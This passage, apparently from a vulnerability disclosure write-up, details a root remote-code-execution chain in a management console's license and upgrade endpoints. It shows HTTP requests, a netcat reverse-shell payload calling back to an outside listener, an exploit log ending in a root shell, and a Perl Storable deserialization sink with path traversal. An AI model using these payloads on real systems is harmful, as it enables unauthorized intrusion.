>\u002Ftmp\u002Ff",[1471,5956,5946],{"class":2257},[1471,5958,1767],{"class":1523},[1471,5960,3966],{"class":1491},[184,5962,5963],{},"The server will respond with an error saying that the license is invalid:",[1449,5965,5967],{"className":3138,"code":5966,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 200 OK\nServer: Mojolicious (Perl)\nContent-Type: application\u002Fjson\nContent-Length: 219\n\n{\"data\":{\"lic\":\"#!\u002Fbin\u002Fsh\\n# This script was generated using Makeself\\n\\nrm \u002Ftmp\u002Ff;mkfifo \u002Ftmp\u002Ff;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc 10.0.1.10 1337 >\u002Ftmp\u002Ff\\n\",\"statusmsg\":\"License is 
Invalid.\\n\",\"status\":0,\"isBaseLicense\":0}}\n",[1277,5968,5969,5981,5989,5997,6006,6010],{"__ignoreMap":148},[1471,5970,5971,5973,5975,5977,5979],{"class":1473,"line":1474},[1471,5972,3153],{"class":2247},[1471,5974,55],{"class":1487},[1471,5976,3213],{"class":2328},[1471,5978,3473],{"class":2328},[1471,5980,3476],{"class":1527},[1471,5982,5983,5985,5987],{"class":1473,"line":149},[1471,5984,3234],{"class":3163},[1471,5986,1447],{"class":2247},[1471,5988,3239],{"class":1527},[1471,5990,5991,5993,5995],{"class":1473,"line":1498},[1471,5992,3254],{"class":3163},[1471,5994,1447],{"class":2247},[1471,5996,3863],{"class":1527},[1471,5998,5999,6001,6003],{"class":1473,"line":1536},[1471,6000,3274],{"class":3163},[1471,6002,1447],{"class":2247},[1471,6004,6005],{"class":1527}," 219\n",[1471,6007,6008],{"class":1473,"line":1546},[1471,6009,3383],{"emptyLinePlaceholder":54},[1471,6011,6012,6015,6018,6022,6024,6026,6028,6032,6034,6036,6039,6042,6044,6046,6049,6051,6053,6055,6057,6059,6062,6064,6066,6068,6071,6073,6075,6077,6079,6082,6084,6086,6088,6090,6092,6095,6097,6099,6101],{"class":1473,"line":1580},[1471,6013,6014],{"class":1491},"{",[1471,6016,1767],{"class":6017},"saDeg",[1471,6019,6021],{"class":6020},"sEff5","data",[1471,6023,1767],{"class":6017},[1471,6025,5167],{"class":1491},[1471,6027,1767],{"class":6017},[1471,6029,6031],{"class":6030},"s_MOj","lic",[1471,6033,1767],{"class":6017},[1471,6035,1447],{"class":1491},[1471,6037,1767],{"class":6038},"sh1VR",[1471,6040,5611],{"class":6041},"sINAO",[1471,6043,5808],{"class":2257},[1471,6045,5620],{"class":6041},[1471,6047,6048],{"class":2257},"\\n\\n",[1471,6050,5954],{"class":6041},[1471,6052,5808],{"class":2257},[1471,6054,1767],{"class":6038},[1471,6056,2298],{"class":1491},[1471,6058,1767],{"class":6017},[1471,6060,6061],{"class":6030},"statusmsg",[1471,6063,1767],{"class":6017},[1471,6065,1447],{"class":1491},[1471,6067,1767],{"class":6038},[1471,6069,6070],{"class":6041},"License is 
Invalid.",[1471,6072,5808],{"class":2257},[1471,6074,1767],{"class":6038},[1471,6076,2298],{"class":1491},[1471,6078,1767],{"class":6017},[1471,6080,6081],{"class":6030},"status",[1471,6083,1767],{"class":6017},[1471,6085,1447],{"class":1491},[1471,6087,2502],{"class":2328},[1471,6089,2298],{"class":1491},[1471,6091,1767],{"class":6017},[1471,6093,6094],{"class":6030},"isBaseLicense",[1471,6096,1767],{"class":6017},[1471,6098,1447],{"class":1491},[1471,6100,2502],{"class":2328},[1471,6102,6103],{"class":1491},"}}\n",[184,6105,6106,6107,6109,6110,6112],{},"But on the disk, the file will be deserialized from JSON and written to ",[1277,6108,1322],{}," with the fully formed shell script. Finally, the ",[1277,6111,1329],{}," interface is called. This also takes a set of special arguments:",[227,6114,6115,6126,6135],{},[230,6116,6117,6119,6120,6122,6123,6125],{},[1277,6118,5423],{},": the function being called by the server. In our case, this is ",[1277,6121,1333],{},", but in the exploit’s case can be any function that has an ",[1277,6124,3778],{}," permission mark.",[230,6127,6128,6130,6131,6134],{},[1277,6129,3983],{},": a JSON array that contains all the parameters for the function call in the order that they are called by the function. 
In this case, we are sending ",[1277,6132,6133],{},"[\"\u002Fvar\u002Ftmp\u002Flicense.tmp\",[\"42fb13fa-82e0-47a1-b147-3d64c8b9c708\"]]"," which contains the location of install files and a random UUID that is required to select the \"local install\" option of the readiness call (theoretically, if the system has a remote install setup and the sensors’ UUIDs are known, this should also allow execution on remote sensors).",[230,6136,6137,6139],{},[1277,6138,1306],{},": contains the retrieved CSRF token",[184,6141,6142],{},"Calling this will finally trigger the remote code execution as root:",[1449,6144,6146],{"className":3138,"code":6145,"language":3140,"meta":148,"style":148},"POST \u002Fpjb.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 224\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: 
*\u002F*\n\nfunction=SF::UI::DataObjectLibrary::upgradeReadinessCall&parameters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[1277,6147,6148,6160,6168,6176,6185,6193,6201,6209,6217,6221],{"__ignoreMap":148},[1471,6149,6150,6152,6154,6156,6158],{"class":1473,"line":1474},[1471,6151,3809],{"class":1483},[1471,6153,4000],{"class":1487},[1471,6155,3153],{"class":2247},[1471,6157,55],{"class":1487},[1471,6159,3158],{"class":2328},[1471,6161,6162,6164,6166],{"class":1473,"line":149},[1471,6163,3164],{"class":3163},[1471,6165,1447],{"class":2247},[1471,6167,3169],{"class":1527},[1471,6169,6170,6172,6174],{"class":1473,"line":1498},[1471,6171,3428],{"class":3163},[1471,6173,1447],{"class":2247},[1471,6175,3433],{"class":1527},[1471,6177,6178,6180,6182],{"class":1473,"line":1536},[1471,6179,3274],{"class":3163},[1471,6181,1447],{"class":2247},[1471,6183,6184],{"class":1527}," 224\n",[1471,6186,6187,6189,6191],{"class":1473,"line":1546},[1471,6188,3849],{"class":3163},[1471,6190,1447],{"class":2247},[1471,6192,3854],{"class":1527},[1471,6194,6195,6197,6199],{"class":1473,"line":1580},[1471,6196,3254],{"class":3163},[1471,6198,1447],{"class":2247},[1471,6200,4048],{"class":1527},[1471,6202,6203,6205,6207],{"class":1473,"line":1612},[1471,6204,3174],{"class":3163},[1471,6206,1447],{"class":2247},[1471,6208,3179],{"class":1527},[1471,6210,6211,6213,6215],{"class":1473,"line":1624},[1471,6212,3876],{"class":3163},[1471,6214,1447],{"class":2247},[1471,6216,3881],{"class":1527},[1471,6218,6219],{"class":1473,"line":1648},[1471,6220,3383],{"emptyLinePlaceholder":54},[1471,6222,6223],{"class":1473,"line":1654},[1471,6224,6225],{"class":1487},"function=SF::UI::DataObjectLibrary::upgradeReadinessCall&parameters=%5b%22%2fvar%2ftmp%2flicense.tmp%22%2c%5b%2242fb13fa-82e0-47a1-b147-3d64c8b9c708%22%5d%5d&get_all_errors=1&sf_action_id=f1f81c499eae90c14444e2a332e6b932&ss=\n",[144
9,6227,6231],{"className":6228,"code":6229,"language":6230,"meta":148,"style":148},"language-shellsession shiki shiki-themes material-theme-lighter github-light github-dark monokai","poptart@grimm $ .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \ntime=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\ntime=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\ntime=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\ntime=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\ntime=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\ntime=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\ntime=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\ntime=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\ntime=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\nsh: cannot set terminal process group (14096): Inappropriate ioctl for device\nsh: no job control in this shell\nsh-5.1# id\nid\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\nsh-5.1# exit\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for 
SSL shell server\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\ntime=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n","shellsession",[1277,6232,6233,6244,6250,6255,6260,6265,6270,6275,6280,6285,6290,6295,6300,6305,6310,6321,6326,6331,6340,6345,6350],{"__ignoreMap":148},[1471,6234,6235,6239,6241],{"class":1473,"line":1474},[1471,6236,6238],{"class":6237},"sQqfL","poptart@grimm",[1471,6240,1505],{"class":1491},[1471,6242,6243],{"class":1487}," .\u002Fbuild\u002Fcve-2026-20079_linux-amd64 -lhost 10.0.1.10 -lport 1337 -rhost 10.0.0.226 -rport 443 -s -e \n",[1471,6245,6246],{"class":1473,"line":149},[1471,6247,6249],{"class":6248},"s91G_","time=2026-03-19T19:00:38.699-06:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\n",[1471,6251,6252],{"class":1473,"line":1498},[1471,6253,6254],{"class":6248},"time=2026-03-19T19:00:38.778-06:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\n",[1471,6256,6257],{"class":1473,"line":1536},[1471,6258,6259],{"class":6248},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.226 port=443 ssl=true \"ssl auto\"=false\n",[1471,6261,6262],{"class":1473,"line":1546},[1471,6263,6264],{"class":6248},"time=2026-03-19T19:00:38.779-06:00 level=STATUS msg=\"Sending initial request for session fixation using hardcoded report user credentials\"\n",[1471,6266,6267],{"class":1473,"line":1580},[1471,6268,6269],{"class":6248},"time=2026-03-19T19:00:40.103-06:00 level=STATUS msg=\"CGISESSID csm_processes Session ID exists, continuing redirect\"\n",[1471,6271,6272],{"class":1473,"line":1612},[1471,6273,6274],{"class":6248},"time=2026-03-19T19:00:40.553-06:00 level=STATUS msg=\"Session successfully redirected, continuing redirect logic to get action token\"\n",[1471,6276,6277],{"class":1473,"line":1624},[1471,6278,6279],{"class":6248},"time=2026-03-19T19:00:40.702-06:00 level=SUCCESS msg=\"Authentication 
successful, extracted sf_action_id: 0d3973edb30b9061fc55a0187985949d\"\n",[1471,6281,6282],{"class":1473,"line":1648},[1471,6283,6284],{"class":6248},"time=2026-03-19T19:00:40.702-06:00 level=STATUS msg=\"Writing payload to disk via license validation on sajaxintf.cgi\"\n",[1471,6286,6287],{"class":1473,"line":1654},[1471,6288,6289],{"class":6248},"time=2026-03-19T19:00:40.730-06:00 level=STATUS msg=\"Triggering payload on pjb.cgi via license file and upgradeReadinessCall\"\n",[1471,6291,6292],{"class":1473,"line":1662},[1471,6293,6294],{"class":6248},"time=2026-03-19T19:00:40.973-06:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.226:44208\"\n",[1471,6296,6297],{"class":1473,"line":1673},[1471,6298,6299],{"class":6248},"time=2026-03-19T19:00:40.973-06:00 level=STATUS msg=\"Active shell from 10.0.0.226:44208\"\n",[1471,6301,6302],{"class":1473,"line":1681},[1471,6303,6304],{"class":6248},"sh: cannot set terminal process group (14096): Inappropriate ioctl for device\n",[1471,6306,6307],{"class":1473,"line":1691},[1471,6308,6309],{"class":6248},"sh: no job control in this shell\n",[1471,6311,6312,6315,6318],{"class":1473,"line":1699},[1471,6313,6314],{"class":6237},"sh-5.1",[1471,6316,6317],{"class":1491},"#",[1471,6319,6320],{"class":1487}," id\n",[1471,6322,6323],{"class":1473,"line":1705},[1471,6324,6325],{"class":6248},"id\n",[1471,6327,6328],{"class":1473,"line":1733},[1471,6329,6330],{"class":6248},"uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),91(certs)\n",[1471,6332,6333,6335,6337],{"class":1473,"line":1773},[1471,6334,6314],{"class":6237},[1471,6336,6317],{"class":1491},[1471,6338,6339],{"class":1487}," exit\n",[1471,6341,6342],{"class":1473,"line":1789},[1471,6343,6344],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell 
server\"\n",[1471,6346,6347],{"class":1473,"line":1805},[1471,6348,6349],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"Connection closed: 10.0.0.226:44208\"\n",[1471,6351,6352],{"class":1473,"line":50},[1471,6353,6354],{"class":6248},"time=2026-03-19T19:00:43.064-06:00 level=STATUS msg=\"C2 server exited\"\n",[246,6356,6358],{"id":6357},"a-note-on-perl-storables","A Note on Perl Storables",[184,6360,6361,6362,6367,6368,6371,6372,6374,6375,1447],{},"The FMC system utilizes the Perl ",[274,6363,6366],{"href":6364,"rel":6365},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable",[278],"Storable"," module all over the place and even does C foreign-function calls to load Perl objects in multiple places. During our testing, we identified that the ",[1277,6369,6370],{},"sajaxintf.cgi"," endpoint allowed a ",[1277,6373,3798],{}," call that ends up trickling into the following suspicious few lines in ",[1277,6376,6377],{},"sf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm",[1449,6379,6381],{"className":1465,"code":6380,"language":1467,"meta":148,"style":148},"sub DeSerialize\n{\n    my $options = shift();\n\n    if (!defined($options->{data}) && !defined($options->{filename}) && !defined($options->{fd}))\n    {\n        return undef;\n    }\n\n    my $deserialized_data;\ntry\n{\n    local $Storable::Eval = $Storable::Eval = 1;\n\n    if (defined($options->{fd}))\n    {\n        $deserialized_data = Storable::fd_retrieve($options->{fd});\n    }\n    elsif (defined($options->{filename}))\n    {\n        my $fn = SF::Reloc::RelocateFilename($options->{filename});\n\n        if(-e $fn)\n        {\n            if ($options->{lock})\n            {\n                $deserialized_data = Storable::lock_retrieve($fn);\n            }\n            else\n            {\n                $deserialized_data = Storable::retrieve($fn);\n            }\n        }\n        else\n        {\n            warn \"Unable to locate file for retrieval: 
$options->{filename}\";\n            return undef;\n        }\n    }\n    elsif ($options->{data})\n    {\n        $deserialized_data = Storable::thaw($options->{data});\n    }\n}\n",[1277,6382,6383,6390,6394,6410,6414,6474,6479,6487,6491,6495,6504,6509,6513,6528,6532,6554,6558,6578,6582,6605,6609,6630,6634,6649,6654,6675,6680,6693,6698,6703,6707,6718,6722,6727,6732,6736,6757,6766,6771,6776,6795,6800,6820,6825],{"__ignoreMap":148},[1471,6384,6385,6387],{"class":1473,"line":1474},[1471,6386,4158],{"class":4157},[1471,6388,6389],{"class":4161}," DeSerialize\n",[1471,6391,6392],{"class":1473,"line":149},[1471,6393,5769],{"class":1487},[1471,6395,6396,6398,6400,6403,6406,6408],{"class":1473,"line":1498},[1471,6397,1502],{"class":1501},[1471,6399,1505],{"class":1491},[1471,6401,6402],{"class":1487},"options = ",[1471,6404,6405],{"class":1554},"shift",[1471,6407,4378],{"class":1491},[1471,6409,1770],{"class":1487},[1471,6411,6412],{"class":1473,"line":1536},[1471,6413,3383],{"emptyLinePlaceholder":54},[1471,6415,6416,6418,6421,6423,6425,6427,6430,6432,6434,6436,6439,6441,6443,6445,6447,6449,6451,6454,6456,6458,6460,6462,6464,6466,6468,6471],{"class":1473,"line":1546},[1471,6417,1549],{"class":1483},[1471,6419,6420],{"class":1487}," (!",[1471,6422,4214],{"class":1554},[1471,6424,1558],{"class":1487},[1471,6426,1492],{"class":1491},[1471,6428,6429],{"class":1487},"options",[1471,6431,1517],{"class":1516},[1471,6433,6014],{"class":1487},[1471,6435,6021],{"class":2257},[1471,6437,6438],{"class":1487},"}) && 
!",[1471,6440,4214],{"class":1554},[1471,6442,1558],{"class":1487},[1471,6444,1492],{"class":1491},[1471,6446,6429],{"class":1487},[1471,6448,1517],{"class":1516},[1471,6450,6014],{"class":1487},[1471,6452,6453],{"class":2257},"filename",[1471,6455,6438],{"class":1487},[1471,6457,4214],{"class":1554},[1471,6459,1558],{"class":1487},[1471,6461,1492],{"class":1491},[1471,6463,6429],{"class":1487},[1471,6465,1517],{"class":1516},[1471,6467,6014],{"class":1487},[1471,6469,6470],{"class":2257},"fd",[1471,6472,6473],{"class":1487},"}))\n",[1471,6475,6476],{"class":1473,"line":1580},[1471,6477,6478],{"class":1487},"    {\n",[1471,6480,6481,6483,6485],{"class":1473,"line":1612},[1471,6482,1776],{"class":1483},[1471,6484,4344],{"class":1554},[1471,6486,1770],{"class":1487},[1471,6488,6489],{"class":1473,"line":1624},[1471,6490,1651],{"class":1487},[1471,6492,6493],{"class":1473,"line":1648},[1471,6494,3383],{"emptyLinePlaceholder":54},[1471,6496,6497,6499,6501],{"class":1473,"line":1654},[1471,6498,1502],{"class":1501},[1471,6500,1505],{"class":1491},[1471,6502,6503],{"class":1487},"deserialized_data;\n",[1471,6505,6506],{"class":1473,"line":1662},[1471,6507,6508],{"class":1487},"try\n",[1471,6510,6511],{"class":1473,"line":1673},[1471,6512,5769],{"class":1487},[1471,6514,6515,6518,6520,6523,6525],{"class":1473,"line":1681},[1471,6516,6517],{"class":1501},"    local",[1471,6519,1505],{"class":1491},[1471,6521,6522],{"class":1487},"Storable::Eval = ",[1471,6524,1492],{"class":1491},[1471,6526,6527],{"class":1487},"Storable::Eval = 
1;\n",[1471,6529,6530],{"class":1473,"line":1691},[1471,6531,3383],{"emptyLinePlaceholder":54},[1471,6533,6534,6536,6538,6540,6542,6544,6546,6548,6550,6552],{"class":1473,"line":1699},[1471,6535,1549],{"class":1483},[1471,6537,1488],{"class":1487},[1471,6539,4214],{"class":1554},[1471,6541,1558],{"class":1487},[1471,6543,1492],{"class":1491},[1471,6545,6429],{"class":1487},[1471,6547,1517],{"class":1516},[1471,6549,6014],{"class":1487},[1471,6551,6470],{"class":2257},[1471,6553,6473],{"class":1487},[1471,6555,6556],{"class":1473,"line":1705},[1471,6557,6478],{"class":1487},[1471,6559,6560,6562,6565,6567,6569,6571,6573,6575],{"class":1473,"line":1733},[1471,6561,1583],{"class":1491},[1471,6563,6564],{"class":1487},"deserialized_data = Storable::fd_retrieve(",[1471,6566,1492],{"class":1491},[1471,6568,6429],{"class":1487},[1471,6570,1517],{"class":1516},[1471,6572,6014],{"class":1487},[1471,6574,6470],{"class":2257},[1471,6576,6577],{"class":1487},"});\n",[1471,6579,6580],{"class":1473,"line":1773},[1471,6581,1651],{"class":1487},[1471,6583,6584,6587,6589,6591,6593,6595,6597,6599,6601,6603],{"class":1473,"line":1789},[1471,6585,6586],{"class":1483},"    elsif",[1471,6588,1488],{"class":1487},[1471,6590,4214],{"class":1554},[1471,6592,1558],{"class":1487},[1471,6594,1492],{"class":1491},[1471,6596,6429],{"class":1487},[1471,6598,1517],{"class":1516},[1471,6600,6014],{"class":1487},[1471,6602,6453],{"class":2257},[1471,6604,6473],{"class":1487},[1471,6606,6607],{"class":1473,"line":1805},[1471,6608,6478],{"class":1487},[1471,6610,6611,6613,6615,6618,6620,6622,6624,6626,6628],{"class":1473,"line":50},[1471,6612,1708],{"class":1501},[1471,6614,1505],{"class":1491},[1471,6616,6617],{"class":1487},"fn = 
SF::Reloc::RelocateFilename(",[1471,6619,1492],{"class":1491},[1471,6621,6429],{"class":1487},[1471,6623,1517],{"class":1516},[1471,6625,6014],{"class":1487},[1471,6627,6453],{"class":2257},[1471,6629,6577],{"class":1487},[1471,6631,6632],{"class":1473,"line":3639},[1471,6633,3383],{"emptyLinePlaceholder":54},[1471,6635,6636,6639,6641,6644,6646],{"class":1473,"line":3644},[1471,6637,6638],{"class":1483},"        if",[1471,6640,1558],{"class":1487},[1471,6642,6643],{"class":1516},"-e",[1471,6645,1505],{"class":1491},[1471,6647,6648],{"class":1487},"fn)\n",[1471,6650,6651],{"class":1473,"line":45},[1471,6652,6653],{"class":1487},"        {\n",[1471,6655,6656,6659,6661,6663,6665,6667,6669,6672],{"class":1473,"line":4393},[1471,6657,6658],{"class":1483},"            if",[1471,6660,1488],{"class":1487},[1471,6662,1492],{"class":1491},[1471,6664,6429],{"class":1487},[1471,6666,1517],{"class":1516},[1471,6668,6014],{"class":1487},[1471,6670,6671],{"class":2257},"lock",[1471,6673,6674],{"class":1487},"})\n",[1471,6676,6677],{"class":1473,"line":4409},[1471,6678,6679],{"class":1487},"            {\n",[1471,6681,6682,6685,6688,6690],{"class":1473,"line":4434},[1471,6683,6684],{"class":1491},"                $",[1471,6686,6687],{"class":1487},"deserialized_data = Storable::lock_retrieve(",[1471,6689,1492],{"class":1491},[1471,6691,6692],{"class":1487},"fn);\n",[1471,6694,6695],{"class":1473,"line":4461},[1471,6696,6697],{"class":1487},"            }\n",[1471,6699,6700],{"class":1473,"line":4478},[1471,6701,6702],{"class":1483},"            else\n",[1471,6704,6705],{"class":1473,"line":4498},[1471,6706,6679],{"class":1487},[1471,6708,6709,6711,6714,6716],{"class":1473,"line":4503},[1471,6710,6684],{"class":1491},[1471,6712,6713],{"class":1487},"deserialized_data = 
Storable::retrieve(",[1471,6715,1492],{"class":1491},[1471,6717,6692],{"class":1487},[1471,6719,6720],{"class":1473,"line":4511},[1471,6721,6697],{"class":1487},[1471,6723,6724],{"class":1473,"line":4535},[1471,6725,6726],{"class":1487},"        }\n",[1471,6728,6729],{"class":1473,"line":4551},[1471,6730,6731],{"class":1483},"        else\n",[1471,6733,6734],{"class":1473,"line":4572},[1471,6735,6653],{"class":1487},[1471,6737,6738,6741,6743,6746,6748,6750,6753,6755],{"class":1473,"line":4577},[1471,6739,6740],{"class":1554},"            warn",[1471,6742,1739],{"class":1523},[1471,6744,6745],{"class":1527},"Unable to locate file for retrieval: ",[1471,6747,1492],{"class":1491},[1471,6749,6429],{"class":1487},[1471,6751,6752],{"class":1527},"->{filename}",[1471,6754,1767],{"class":1523},[1471,6756,1770],{"class":1487},[1471,6758,6759,6762,6764],{"class":1473,"line":4585},[1471,6760,6761],{"class":1483},"            return",[1471,6763,4344],{"class":1554},[1471,6765,1770],{"class":1487},[1471,6767,6769],{"class":1473,"line":6768},38,[1471,6770,6726],{"class":1487},[1471,6772,6774],{"class":1473,"line":6773},39,[1471,6775,1651],{"class":1487},[1471,6777,6779,6781,6783,6785,6787,6789,6791,6793],{"class":1473,"line":6778},40,[1471,6780,6586],{"class":1483},[1471,6782,1488],{"class":1487},[1471,6784,1492],{"class":1491},[1471,6786,6429],{"class":1487},[1471,6788,1517],{"class":1516},[1471,6790,6014],{"class":1487},[1471,6792,6021],{"class":2257},[1471,6794,6674],{"class":1487},[1471,6796,6798],{"class":1473,"line":6797},41,[1471,6799,6478],{"class":1487},[1471,6801,6803,6805,6808,6810,6812,6814,6816,6818],{"class":1473,"line":6802},42,[1471,6804,1583],{"class":1491},[1471,6806,6807],{"class":1487},"deserialized_data = 
Storable::thaw(",[1471,6809,1492],{"class":1491},[1471,6811,6429],{"class":1487},[1471,6813,1517],{"class":1516},[1471,6815,6014],{"class":1487},[1471,6817,6021],{"class":2257},[1471,6819,6577],{"class":1487},[1471,6821,6823],{"class":1473,"line":6822},43,[1471,6824,1651],{"class":1487},[1471,6826,6828],{"class":1473,"line":6827},44,[1471,6829,1812],{"class":1487},[184,6831,6832,6833,6836,6837,6839,6840,6842],{},"By combining the ",[1277,6834,6835],{},"licenseValidate"," call with the ",[1277,6838,3798],{}," call, we can write arbitrary binary data to ",[1277,6841,1322],{},", including Storable serialized Perl. Additionally, the license validation logic appears more than happy to accept arbitrary path traversals:",[1449,6844,6846],{"className":3138,"code":6845,"language":3140,"meta":148,"style":148},"POST \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nContent-Length: 65\nAccept-Language: en-US,en;q=0.9\nContent-Type: application\u002Fjson\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nReferer: https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\nConnection: keep-alive\n\n[\"d8bcba74049486588e0e2f11dacfee4f\",\n\"batchResults\",\n\"..\u002Flicense.tmp\",\n\"1\"]\n",[1277,6847,6848,6861,6869,6877,6886,6894,6902,6910,6919,6927,6931,6944,6954,6964],{"__ignoreMap":148},[1471,6849,6850,6852,6855,6857,6859],{"class":1473,"line":1474},[1471,6851,3809],{"class":1483},[1471,6853,6854],{"class":1487}," \u002Fsajaxintf.cgi?rs=callServerFunc&rstime=1772810888984 
",[1471,6856,3153],{"class":2247},[1471,6858,55],{"class":1487},[1471,6860,3158],{"class":2328},[1471,6862,6863,6865,6867],{"class":1473,"line":149},[1471,6864,3164],{"class":3163},[1471,6866,1447],{"class":2247},[1471,6868,3169],{"class":1527},[1471,6870,6871,6873,6875],{"class":1473,"line":1498},[1471,6872,3428],{"class":3163},[1471,6874,1447],{"class":2247},[1471,6876,3433],{"class":1527},[1471,6878,6879,6881,6883],{"class":1473,"line":1536},[1471,6880,3274],{"class":3163},[1471,6882,1447],{"class":2247},[1471,6884,6885],{"class":1527}," 65\n",[1471,6887,6888,6890,6892],{"class":1473,"line":1546},[1471,6889,3849],{"class":3163},[1471,6891,1447],{"class":2247},[1471,6893,3854],{"class":1527},[1471,6895,6896,6898,6900],{"class":1473,"line":1580},[1471,6897,3254],{"class":3163},[1471,6899,1447],{"class":2247},[1471,6901,3863],{"class":1527},[1471,6903,6904,6906,6908],{"class":1473,"line":1612},[1471,6905,3174],{"class":3163},[1471,6907,1447],{"class":2247},[1471,6909,3179],{"class":1527},[1471,6911,6912,6914,6916],{"class":1473,"line":1624},[1471,6913,5889],{"class":3163},[1471,6915,1447],{"class":2247},[1471,6917,6918],{"class":1527}," 
https:\u002F\u002F10.0.0.226\u002Frna_policy\u002Frna_policy_creation.cgi\n",[1471,6920,6921,6923,6925],{"class":1473,"line":1648},[1471,6922,3194],{"class":3163},[1471,6924,1447],{"class":2247},[1471,6926,3199],{"class":1527},[1471,6928,6929],{"class":1473,"line":1654},[1471,6930,3383],{"emptyLinePlaceholder":54},[1471,6932,6933,6935,6937,6940,6942],{"class":1473,"line":1662},[1471,6934,3898],{"class":1491},[1471,6936,1767],{"class":1523},[1471,6938,6939],{"class":1527},"d8bcba74049486588e0e2f11dacfee4f",[1471,6941,1767],{"class":1523},[1471,6943,5927],{"class":1491},[1471,6945,6946,6948,6950,6952],{"class":1473,"line":1673},[1471,6947,1767],{"class":1523},[1471,6949,3798],{"class":1527},[1471,6951,1767],{"class":1523},[1471,6953,5927],{"class":1491},[1471,6955,6956,6958,6960,6962],{"class":1473,"line":1681},[1471,6957,1767],{"class":1523},[1471,6959,5518],{"class":1527},[1471,6961,1767],{"class":1523},[1471,6963,5927],{"class":1491},[1471,6965,6966,6968,6970,6972],{"class":1473,"line":1691},[1471,6967,1767],{"class":1523},[1471,6969,454],{"class":1527},[1471,6971,1767],{"class":1523},[1471,6973,3966],{"class":1491},[184,6975,6976],{},"Without valid Storable data, the application will respond as follows indicating that the sink above has been reached:",[1449,6978,6980],{"className":3138,"code":6979,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 404 Not Found\nDate: Fri, 06 Mar 2026 15:35:42 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: application\u002Fjson\nContent-Length: 192\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\n{\"error\":{\"text\":\"Error: Magic number checking on storable file failed at 
